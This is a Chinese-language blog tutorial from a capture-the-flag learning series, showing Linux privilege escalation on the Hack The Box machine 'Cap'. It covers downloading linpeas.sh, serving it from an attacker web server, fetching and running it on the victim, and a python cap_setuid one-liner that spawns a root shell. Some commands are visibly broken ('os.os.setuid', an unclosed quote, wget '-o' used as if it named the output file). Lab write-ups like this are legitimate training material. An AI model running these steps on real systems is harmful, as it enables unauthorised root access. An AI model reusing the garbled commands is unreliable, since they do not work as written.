iT邦幫忙

2023 iThome 鐵人賽

DAY 18
0

前言

Linpeas與winpeas的功能類似,只是作業系統的不同,我們直接來看範例。

正文

我以靶機Cap為例,首先將linepeas.sh從github上下載。

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh

接著,一樣在我們的主機上開啟網頁伺服器,讓我們能夠將linpeas.sh傳送至目標主機上。

sudo python3 -m http.server 80

在受害主機上執行以下程式碼,將linepeas.sh傳送至受害主機本地。

wget http://[attacker ip]:80/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee output.txt

第一行程式碼向駭客主機的port80發送請求,獲取linpeas.sh檔案,chmod為修改檔案的模式,+x讓我們能夠在目標主機執行linpeas.sh,最後一行執行linpeas.sh,並且將結果輸出至output.txt中。

cat output.txt


從結果我們看到,可以利用python設置cap_setuid,cap_setuid是linux作業系統裡的權限設置,如果uid為0,代表為root使用者。

python3 -c 'import os; os.os.setuid(0); os.system("/bin/sh")

接著,我們利用python設置uid為0,將權限提升至root,並且執行shell,我們就取得了最高的權限,接下來取得root.txt就完成了。


上一篇
[Day 17]Windows提權-winpeas (Windows privilege escalation- winpeas)
下一篇
[Day 19] Windows提權工具-Windows exploit suggester
系列文
入門級資安實戰:以Hack The Box為輔學習網路漏洞掃描與利用25
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言